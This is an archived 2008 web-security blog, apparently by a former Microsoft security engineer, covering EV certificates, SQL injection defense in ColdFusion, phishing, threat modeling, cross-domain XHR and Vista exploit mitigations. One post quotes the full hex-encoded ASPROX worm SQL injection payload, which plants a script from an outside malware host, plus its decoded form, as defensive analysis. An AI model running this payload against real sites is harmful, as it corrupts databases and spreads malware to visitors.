The Wayback Machine - https://web.archive.org/web/20081207072423/http://www.analyticalengine.net:80/
4
Dec

What a crock

   Posted by: Joshbw   in General Ramblings

In a recent conversation with a colleague on SSL and how it worked, it occurred to me that I really had no idea what extended verification certificates actually did, other than turn the address bar green and display the company name. What was the “extended verification” that made EV certs better than normal certs? In a normal SSL connection the client can do a reverse lookup based off of the cert to verify the host, but DNS poisoning would obviously render this worthless. Do EV Certs have some magic in their “extended verification” that addresses this shortcoming?

In a word, no. There is no technical advancement in the EV cert. There is no technology that makes the EV certificate a better option than a normal cert, that works around the weakness of the regular cert in verifying hosts. What the EV means is that the cert authority no longer does a half-assed job verifying that they are issuing a certificate for a particular company to that company. They do a bit more background checking so that they can attest that the company listed in the cert is really the same company requesting it. It is brilliant marketing, as you are paying double to three times the cost of a normal cert just to turn the address bar green and to get the CA to actually do some checking on who requests a cert.

The thing is, despite the fact that there is no technological benefit of this, and the fact that current cert prices should have already included verifying the requester, that stupid green address bar is probably worth the money just to increase customer confidence. But go ahead and be bitter about it, since that shade of green is going to cost you another grand for each certificate. Man is Verisign brilliantly evil in their product ideas, right up there with the guy who conned children into buying pet rocks.

~ Joshbw

12
Nov

Hurray HTTPOnly

   Posted by: Joshbw   in Browser/Web Security

Hey Jim, MS fixed MSXML so that XHR can’t be used as a work around to get the cookies when HTTPOnly is used. I think that makes IE first to have full HTTPOnly support. Now when HTTPOnly is used an attacker can’t get the session at all via XSS, they can only completely deface the website, use javascript keyloggers to monitor all use on the website, forward users off to phishing sites, host malware on legitimate hosts, and other little things.

One hole filled, uncountable holes left.

(unrelated, it’s posts like this that suggest security folks some times speak their own language)

~ Joshbw

Giblets aren’t just the disgusting parts of the turkey, the foul (or fowl if you are no stranger to puns) organs that your grandma likes to try to fool you into eating for her own perverse amusement. In certain parlance they also refer to the external code that your applications is dependent on- source code for which you have little or no control. Giblets are typically libraries, assemblies, jars, or other such modules that a third party, whether it is an external company (for example, the excellent looking Elegant Ribbon), another internal team, a vendor, etc. wrote. They are also a huge security concern as you usually have little insight into what security was incorporated in the giblets’ development cycle, nor a great deal of control when vulnerabilities are discovered in the giblet. You can make your own code rock solid, but still find your application exploited because of Giblet code. MS Office has been hit by this a number of times, as legacy and third party file filters continue to be vulnerable despite the dramatic re-engineering of the Office file formats (.docx, .xlsx, etc) with security in mind.

Recently my colleagues and I have been playing around with several different HTML Encoders in Java. Despite what OWASP has posted on the subject for an international enterprise it is not as simple as encoding everything that isn’t A-Z,a-z,0-9 (though I don’t think OWASP is making any claim at the robustness of their recommendation). Having all of your Chinese radicals all of a sudden converted to full character encoded values is going to dramatically increase page size, especially on anything like a blog or other large text field with copious blocks of user input that gets echoed to the screen. Most people don’t want to figure out how to implement their own character set aware, internationalized Entity Encoder, and so naturally prefer to use canned solutions. The desire to use a canned library is by no means unique to HTML Entity Encoding; for any number of functions this makes sense, since many functions take specific expertise (do you think your average PHP programmer wants to worry about image manipulation implementations for example). However in this specific case it easily demonstrates why Giblets are a big fat bag of security suck. What happens when there is a flaw in the Encoder giblet? You really don’t know what the inside of it looks like- you don’t know how well written it is. You trust that it works, but if your output encoder isn’t encoding all output properly your defense against XSS is now vulnerable.

Really any giblet that processes or transforms external data is a point of concern. To some extent open source giblets can be better, as you can at least look inside and see how well written something is (though I suspect that the number of people who do so are probably in the minority), but for enterprises this can actually be a liability, as legal departments worry about license compliance and IP taint. For all other Giblets, there are a couple of recommendations to make you safer -

1) Ask for details about the Giblet Developer’s secure development lifecycle, vulnerability history, mean time to patch, and other useful behavioral questions about their security posture. It might be worth going with a giblet that has a bit less functionality if the security posture of the developers seems higher.

2) External, Vendor, or Internal, get an SLA in place that clearly defines obligations. Include obligations to patch vulnerabilities of various criticality ratings, time frames for said patches, agreed upon criticality scales (do you consider SQLi to be critical while they think it high?), and maintenance length (if a vulnerability is found five years after you purchased the giblet, are you out of luck getting a fix). This is often overlooked when working with internally developed code from other teams; however just as with external developers your security vulnerability may not be the internal teams priority. You need a commitment to address vulnerabilities in a timely fashion.

For non-commercial giblets, especially open source, you probably won’t get an SLA, so explore the ramifications and practicality of fixing the flaw yourself (see afore mentioned worry about license compliance and IP Taint). Non-commercial, non open source giblets (freeware) are very dangerous as you have no assurance concerning timely fixes, nor the capacity to fix them yourself.

3) Try to validate/sanitize all data before passing it to a giblet anyway, even if the Giblet developer has a great security posture and a very aggressive SLA. An added layer of defense is never a bad thing.

4) If the Giblet is consumed by a client, make sure any agreement with the Giblet developer includes the rights to distribute updated versions to the client.

Most importantly though, just keep in mind that third party code is a risk. Security should be as much a consideration as features when incorporating third party code and all of the security effort you put in may be for naught if your 3rd party code is vulnerable. When I draw threat models I like to label Giblets as External Entities even if they are processes or libraries consumed on the same box, as I have no control over them. It just helps to draw out the ramifications of their use.

~ Joshbw

22
Oct

Preventing SQL Injection in Cold Fusion

   Posted by: Joshbw   in Browser/Web Security

Well, the ASPROX worm has morphed to go after any page it finds ending with .cfm, which makes a good deal of sense. Much like .asp sites, a cold fusion site probably hasn’t been worked on in several years, was probably developed prior to SQL Injection being much of a worry, and is likely using SQL Server behind the scenes. The other day I stumbled across a website that was having problems connecting to their database, and as a result spit out a lovely exception trace to the screen, including the exact syntax of their SQL Query, which was not using prepared statements. Wanting to be the good little security monkey, I did some quick research into protecting against SQL Injection with cold fusion and sent the info on to them, as well as suggesting they don’t spill their debug info out onto the interwebs for everyone to see.

Adobe has a pretty good page on protecting against SQL Injection, which makes it a little embarrassing that one of their own sites fell victim, but that will hopefully serve as a warning to us all to worry about legacy apps. Anyway, you can enforce parameter typing withing your existing cfquery pretty easily by wrapping each parameter in a cfqueryparam . For example, the following query:

<cfquery name=”Recordset1″ datasource=”mydatasource”>
SELECT *
FROM myTable
WHERE myTableID =#URL.my_Table_ID#</cfquery>

would be turned into

<cfquery name=”Recordset1″ datasource=”mydatasource”>
SELECT *
FROM myTable
WHERE myTableID =<cfqueryparam value=”#URL.my_Table_ID#” cfsqltype=”cf_sql_numeric”></cfquery>

The cf_sql_numeric value ensures that the value passed will be considered as a number, rather than a string or function. This particular value should be of interest for everyone protecting against ASPROX since rather than targeting strings, it targets parts of your query that you assume are numbers. You can find a list of all potential cfsqltype values here. Also listed are other attributes that can be valuable doing rudimentary validation when using cfqueryparam, such as maxLength (it does what you think) and scale (number of decimal places in a number). If you know of any old cold fusion sites out there, let the devs know that they should probably go back and make sure they are using cfqueryparam with all of their SQL parameters. With how effective ASPROX is at finding and exploiting sites, chances are they will be victim if they do not.

~ Joshbw

In my last post, on threat modeling, I had mentioned that there would be a follow up post would talk about the issues to authenticating the communication from the server. My cohort and fellow Josh has been working with me on some side projects with local small and mid-size business to secure their applications (things like auto dealership websites that collect information for credit checks) to offset all that money our investment accounts have taken in the past 18 months with some extra income. In that process we have noticed several issues that keep coming up that make it harder to be confident we are talking to the application we think we are talking to.

In this day and age phishing is so easy because it is hard to authenticate the server to the client. There isn’t end to end trust. Ultimately the user only has a handful of verification methods- does the website visually look like the website they want to connect to, does the URL look like the correct domain, and is the communication over a secure channel, none of which is going to be obvious to non-technical users. The visual appearance is incredibly easy to spoof, to the point where only the most lazy phisher won’t put forth the effort. Short of sternography, the visual appearance can’t be trusted, and sternography isn’t a viable option. So, here are a couple of things you can do outside of the visual appearance.

- Don’t use multiple domain names. You can register multiple domains, but always have them redirect to one domain, and never advertise anything but that one domain. This prevents dilution of the domain name, and trains the user to only trust one domain. Don’t use BobsFordMazdaLincoln.com and BobsMazdaLincolnFord.com, because a phisher can set up bobsLincolnMazdaFord.com or similar name. This is obviously a contrived example, but plenty of companies have a variety of domains for different purposes (Microsoft is really bad about this, and with their live ID being an SSO for all of their domains it is easy for me to phish that credential to great payoff).

It is better to use sub-domains if you have separate sites associated with one company. It is also better to try and have a simple and short domain name, without too many words in it. bobscars.com is way better than BobsMazdaLincolnFord.com because it is much harder to create a variant that fools the users. Bob could then have ford.bobscars.com, mazda.bobscars.com, etc (and this scales if bob ever opens other dealerships). Also, users are more likely to remember your domain name and it will have fewer common mistype permutations (which you should buy, domains are cheap) if it is simple (something for which I am probably guilty with analyticalengine.net, a url that even I mistype occasionally).

- Don’t go crazy with sub domains. You should probably only go one (or very rarely two) deep. mazda.bobscars.com is pretty simple to visually parse as being part of bobscars.com, but year2009.newcars.mazda.fordcorp.bobscars.com is going to be very easy to visually spoof to end users. We need to train customers to look at the domain name, and in order to do that it needs to be as apparent as possible. IE 8 does a good job calling this out, and there is a similar firefox plugin to highlight the domain name, but with many people still using IE 6 we need to focus on getting them to visually parse and recognize the domain (it would also be nice to get them to upgrade to a new browser). If we go overboard with subdomains we make the domain non-obvious and thus make it easy to spoof.

- Use SSL liberally, and use EV certs. The use of EV certs provides visual evidence in the location bar of the browser that this really is the corporation I intend to communicate with. It is one more protection that allows the user to visual identify the site. It offers more than that though, as it can attest to the integrity of the communication back and forth between the site. Afore mentioned cohort Josh has a post on his blog about using Ettercap to intercept communication and alter it in flight. The specific scenario he targeted was javascript based logins, where the page is served over http to improve performance but the login field uses javascript to submit over https; using ettercap he can show how he can modify the javascript while the page is being delivered so that it submits credentials elsewhere.

He recommends that to maintain performance you specifically force users to go to a separate page that is served start to finish over SSL. The problem is that 1) you don’t get the EV Cert based visual confirmation on the landing page if you do this and 2) if your landing page is sent in the clear you can use Ettercap to modify the url to the login page so the user goes offsite to submit credentials. Once a user is logged in you need to either have a ridiculously short session limit or make sure you continue to communicate over SSL, otherwise the sessionid will be sent in the clear which is almost as valuable as the user credentials.

I think it is much better to ALWAYS use SSL with EV certs, forced on every page. That way you get the visual validation of the cert on the landing page, the customer sees the little lock through the whole communication, and the entire conversation is resistant (not immune, but resistant) to tampering. This will impact performance (though I think it might have the advantageous effect of forcing cleaner website design) on dial up (I doubt it is human noticable on broadband) but if you want to provide some level of certainty to the user it is the way to go. Obviously, this should be weighed based on the risk of the site; paypal and banks should obviously do this, engadget probably can do without. As a final piece of advice, make sure that you set the cookie flag so that session information is only sent over secure channels.

These aren’t bullet proof assurances. It is all based on visually notifying the user that this is the site the really mean to be on. It is very reliant on training user behavior, a generally unreliable approach, and then on the user consistently being wary, which is even more unreliable. However, at this point we don’t have much else we can really do. Sandbags may not be an ideal replace for building on high ground, but it beats letting the water in. End to end trust is an unsolved problem but we do what we can.

~ Joshbw

14
Oct

Threat Modeling, quick recommendations

   Posted by: Joshbw   in Secure Development

A paper by Adam Shostack is circulating the blogosphere, and it is worth a read. I’d already left MS before Adam took over as the gatekeeper of threat modeling for SWI but it is nice to see that he basically agrees with the stripped down version that we regularly did in WinCE and that I still evangilize. Mainly-

1) Draw a data flow diagram (DFD) of how data moves around for your application/feature (depending on scope of the model), and where trust boundries are crossed

2) Enumerate threats. The paper has a nice little matrix of what threats are pertinent to what elements of the DFD and while he applies the necessary conditionals about it being specific to MS and perhaps not being universally applicable, I think it is a pretty good reference in general.

3) Determine Mitigations (or decide to let a threat slide)

4) Validate mitigations that are put in place

We lived by those simple steps, rather than getting into the horrid threat trees and DREAD risk modeling and all of that other overhead. I say this having been the security guy for my area in MS, supposedly the expert, and I ignored them. I can’t imagine the average non-security guy going to that trouble. Granted, being a security guy I probably find it a bit easier to subjectively (wait, am I supposed to say qualititavely now that I am a CISSP?) determine risk from a threat than put a number on it, which is what the overhead in threat modeling was supposed to do, but I think most non-experts can still make an educated guess.

Anyway, the reason I am bringing all of this up is to illuminate one aspect that isn’t touched on much in most threat modeling discussion- Don’t just focus on your process/components. When people create a data flow diagram and start thinking about threats and mitigations they tend to focus on threats specific to their own code and how to mitigate stuff entering that code. However if we look at a vulnerability like XSS, it isn’t a threat to your own code, it is a threat to external entities (in this case, client browsers), and the best mitigation is to sanitize (HTML encode) data as it leaves your application rather than validate it as it enters (now you still need to validate it as it enters to make sure it isn’t malicious to your code, but don’t worry about flat out stopping xss with input validation if you can output encode).

Similarly, in the above web app example, a threat model would have us worry about how to authenticate the client for repudiation and information disclosure purposes, but I haven’t been to many threat modeling sessions where the team originaly considered the data flow the other direction (establishing to the client that this is the server you can trust- more on that in a post in the near future).

So as you are developing your threat model be sure to consider threats to each of the entities in the DFD. Don’t focus only on the flow into your components, and don’t consider threats to just your components, but rather look at the full ecology represented in your DFD.

~ Joshbw

Well, you announce that you are going to post a whole bunch of information, including technical details, in a whitepaper through I Hack Charities so that a whole slew of AppSec folks and web hackers go register. Then you notice that the registration is page is in the clear.

Now granted, the whole payment solution is through paypal, so other than your credentials there isn’t much to steal, but seriously Johnny, couldn’t you get Verisign to donate SSL certs for charity?

~ Joshbw

The HTML 5 spec lays out the details for cross domain XHR. I’ve written about my dislike of the idea before (details of the access control spec can be found here; I like how they justify sending cookies via XHR because you send them with img requests. In other news, if you don’t need seatbelts on a motorcycle you don’t need them in a car because obviously they are exactly the same scenarios), specifically why passing cookies is a VERY BAD IDEA.

Today I am going to focus on the other side of things, not from the user’s perspective, but from the perspective of the third party host (3PH) that is now getting requests from the client. To allow a 3PH to make discriminating decisions the source origin of the request (not the client, but the originator host of the call, though because of POORLY WRITTEN AND LAID OUT SPECS I am unable to tell if a page loaded from somesite.com that loads a script from someothersite.com that makes the actual call would consider the source origin somesite or someothersite) is passed in the origin field of the request. This origin is based off of what the browser thinks is the origin, rather than the actual origin. Thus any tricks that would fool a browser into loading a malicious site under a safe url would also fool the 3PH. ARP spoofing (for various reasons I have been exposed to techniques to do this with Ettercap recently, and it makes this very easy), DNS poisoning, and other similar techniques could be employed quite effectively for even bigger payout (not only do you fool the user into disclosing credentials or other sensitive information for website A, you also get all sorts of sensitive information from 3PH via cross domain XHR).

To some extent they could mitigate this. The origin field could also contain the DNS and ARP information the client *thinks* belongs to the origin, and this could be independently verified by the 3PH. Granted, the spec doesn’t call for this, but it *could* be made safer. From the perspective of the 3PH though, even if you can verify that the origin really is the website you expect, there is NO assurance of the integrity of the website. How many sites have XSS or SQL injection? Are you confident that the origin does not? Security is only as strong as the weakest link, and by exposing your customer’s data to the origin through cross domain XHR, that weakest link may be the origin rather than your.

Any data exposed through cross domain XHR should be considered public as soon as it is exposed, regardless of the origin field, since you can’t really verify who really is reading it. Because of that, does it really matter what the origin field says? I think the best bet for cross domain XHR is to explicitly let each user opt in to making certain information available to the world through scripting, with no assurance that only “trusted parties” would be able to script against it (since you can’t make that assurance in good conscience). All data exposed this way may be user specific in nature, but should be of trivial value since it will be effectively unprotected. 3PH should also recognize that this is the easy way of exposing data, but by no means the safe or right way. This whole proposal was introduced by scripters that wanted one more snazzy feature regardless of security implication, because having a federated webservice strategy smacks of effort.

Oh, one last thing to consider 3PH, you need to kill that timeout you put on your session to get all of this to work, which is considered BAD PRACTICE. You open yourself up to all sorts of concerns if your sessions don’t time out, and just because Google follows that bad practice doesn’t mean you should. It is good to make users log in periodically.

~ Joshbw

18
Sep

Output Sanitization

   Posted by: Joshbw   in Browser/Web Security

Jim Manico had a pretty good post on output encoding a couple weeks ago. Please don’t take my comments in its thread to by any means imply that I am disagreeing with his general premise. Injection attacks are one of the most common severe attacks a website could face and security professionals tend to prescribe input validation when output encoding is more appropriate. When passing on data to other sources (the client, a database, other servers), transferring it via a safe method in a sanitized form is the optimal way to go. Input validation in this instance is sub-optimal.

As an example, I am freelancing with a local webhost trying to rectify some attacks against the ASPROX worm. The attack vector is brilliant. What gets submitted is:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0×4445434C415
245204054205641524348415228323535292C40432056415243484152283
2353529204445434C415245205461626C655F437572736F7220435552534
F5220464F522053454C45435420612E6E616D652C622E6E616D652046524
F4D207379736F626A6563747320612C737973636F6C756D6E73206220574
845524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D33352
04F5220622E78747970653D323331204F5220622E78747970653D3136372
9204F50454E205461626C655F437572736F72204645544348204E4558542
046524F4D205461626C655F437572736F7220494E544F2040542C4043205
748494C4528404046455443485F5354415455533D302920424547494E204
55845432827555044415445205B272B40542B275D20534554205B272B404
32B275D3D525452494D28434F4E564552542856415243484152283430303
0292C5B272B40432B275D29292B27273C736372697074207372633D68747
4703A2F2F7777772E61647739352E636F6D2F622E6A733E3C2F736372697
0743E27272729204645544348204E4558542046524F4D205461626C655F4
37572736F7220494E544F2040542C404320454E4420434C4F53452054616
26C655F437572736F72204445414C4C4F43415445205461626C655F43757
2736F7220%20AS%20VARCHAR(4000));EXEC(@S);–

(arg, my kingdom for firefox to add support for “word-wrap:break-word”. I know it was originaly an IE deviation, but it is now in CSS 3. Also, sometimes additions outside of spec are fine when they clearly make sense, like word-wrap.)

This gets interpreted as:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+””’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Now this is a genius little worm. It scans across all the tables available with a cursor and automatically appends the malware attack (usually a reference to a hosted .js that exploits browser vulnerabilities) to the end of all the various fields of some text type. There is some serious SQL ninja stuff that exceeds my T-SQL skills here, but most noteworthy is that there is no ‘ anywhere in the string. Now the vulnerable site WAS doing limited input validation, automatically escaping all ‘ before submitting a query, but that was obviously irrelevant to the attack. Had they just been using bindable queries (aka parameterized queries, depending on your parlance preference) they would have been fine.

All of that does reinforce Jim’s point. For the most common web attacks, XSS and SQL Injection, output sanitization is more effective than input validation. That said, you need to do both. Both of those attacks are actually against external entities, other clients and the database respectively, which illustrates a point- for every external entity you are communicating with you need to pass the output in a clean and safe form to that entity. Hence output encoding/sanitization. To protect yourself, however, you need to do input validation. At the moment output attacks are the most common, as they are relatively easy and don’t require much knowledge of the application logic, however as those holes are plugged there are going to be increasing attacks against the application itself. At that point, input validation is the first line of defense.

So rule of thumb for developing reasonably secure applications- don’t trust any input you get and be sure to validate it, and sanitize all output EVEN if you are doing input avalidation to make sure you aren’t passing off an attack.

~ Joshbw

12
Aug

Windows Buffer Overflow Protection

   Posted by: Joshbw   in Secure Development

At Blackhat this year Mark Dowd of IBM and Alexander Sotirov or VMware presented a paper concerning how to bypass Vista’s Buffer Overflow Countermeasures. The paper is worth a read both because of the vulnerabilities, and because it does a great job detailing how much protection Microsoft has provided to people who can’t write good code. The analysis of the paper by various people on the Internet is mind numbing though (probably this post included).

Before continuing, I think some things need to be established up front. Vista provides protection that no other OS does against poorly written code. Even if the security features were completely worthless Vista would not be more dangerous than any other OS- just more dangerous than Vista from last month. This additional protection was meant to be a stop gap to secure bad code, not an excuse not to fix the bad code. The root cause is that some code sucks to begin with. It is like throwing a WAF on a wide open Internet app. That buffer overflows still exist to the extent they do is just disgraceful to us as an industry. We know exactly what causes buffer overflows and we know how to avoid them. Do not use unchecked buffer copies. Explicitly copy no more data than a buffer can hold (and please, please do not use inline calculations in strncpy, since that may as well be an unchecked buffer copy). Don’t dynamically create the first argument for *printf/*scanf without knowing exactly how many other parameters will need to be provided. And the list goes on. These are all things that static source code analysis tools are remarkably competent at finding. A clever source control system will flat out ban people from checking code in with bad APIs (strcpy and its unchecked brotheren). Finally, fuzz the crap out of all your input points (hey Jim, this is why input validation is important :-p). You will find and kill 99% of your buffer overflows if you do that, and the remaining 1% won’t be very discoverable (bad guys do fuzz testing too you know).

Anyway, there is a reason why MS has had a huge decline in buffer overflows relative to the industry, and it is because they do all of the above. They have too much legacy code and third party giblets to fully get rid of overflows, but all of the extra protection in Vista is primarily to provide some level of protection for the OS because a retarded third party (*cough*quicktime*cough*acrobat*cough*flash*cough) has yet one more buffer overflow that can be used to compromise the box. The protection was not a permanent fix, but simply something to raise the bar to perform exploitation, and I think Microsoft has been reasonably good about presenting it in that light while still trying to sell 3rd party developers on the protection. The biggest flaw in the protections that Vista presents is that applications opt into using them. Programs need to explicitly state they want the protection which is why the paper focuses on exploiting applications that do not have all of the protections (like IE 7 which doesn’t use data execution prevention because the poorly written piece of junk sun java plugin would blow chunks if they did; fortunately IE 8 does use it, as does firefox 3).

Now on to the commentary on the web. Peter Bright of Ars Technica tries to downplay it and many of his points are valid. Bruce Schneier thinks it is a big deal, which is true. A month ago people didn’t know how to bypass these protections but now they do. That is a big deal, but Adrian Kingsley-Hughes of ZDnet is still a moron for saying it renders Vista security next to useless.

So to respond to the commentary, the reason this is a big deal (moreso than Bright believes) but not the end of the world (as Kingsley-Hughes thinks) is that it makes exploits feasible but more costly. Any technological measure that increases the cost of exploiting something will decrease the number of instances that blackhats bother exploiting it. For example, to defeat ASLR the authors advocates hosting a .Net Web Component of sufficient size to dramatically impact how the address space can be randomized, and in order to facilitate downloads they also recommend the webserver hosting the component use gzip compression (which in turn means controlling web server configuration). That’s entirely possible, but if a malware author had the choice between an exploit targetting all of XP that didn’t require that extra work or an exploit for both XP and Vista, I suspect 90% will choose to just go after XP. (the exploit using Java applets is a bit more likely at the moment do to the GIFAR hack recently discussed, since you can very easily get hundreds of sites to host that for you).

On top of that, to bypass the multitude of protections requires some sophistication, which is just going to raise the bar on who crafts the exploits (well, until all of the bypasses are just built into metasploit). Raising the bar lowers the number of attackers capable of compromising the system.

Additionally, the easiest work around for DEP was to target applications that don’t use it, but this will become increasingly difficult, especially as MS enforces DEP to a greater degree. Finally, at least in terms of IE, one feature that was not addressed with the process isolation of the browser in Vista. It remains an open question on whether the IE sandbox in Vista is vulnerable, as it may still contain the attack.

So attacks are now possible, but the exploitability is still more difficult than other platforms. That’s big, but it by no means renders the protection next to useless. As the authors conclude

In this paper we demonstrated that the memory protection mechanisms available in the latest versions of Windows are not always effective when it comes to preventing the exploitation of
memory corruption vulnerabilities in browsers. They raise the bar, but the attacker still has a
good chance of being able to bypass them. Two factors contribute to this problem: the degree to
which the browser state is controlled by the attacker; and the extensible plugin architecture of
modern browsers.

At the end of the day, good OS design cannot completely mitigate bad code. Get rid of buffer overflows and this is all a moot point anyway. Its 2008 people, why aren’t buffer overflows extinct?

~ Joshbw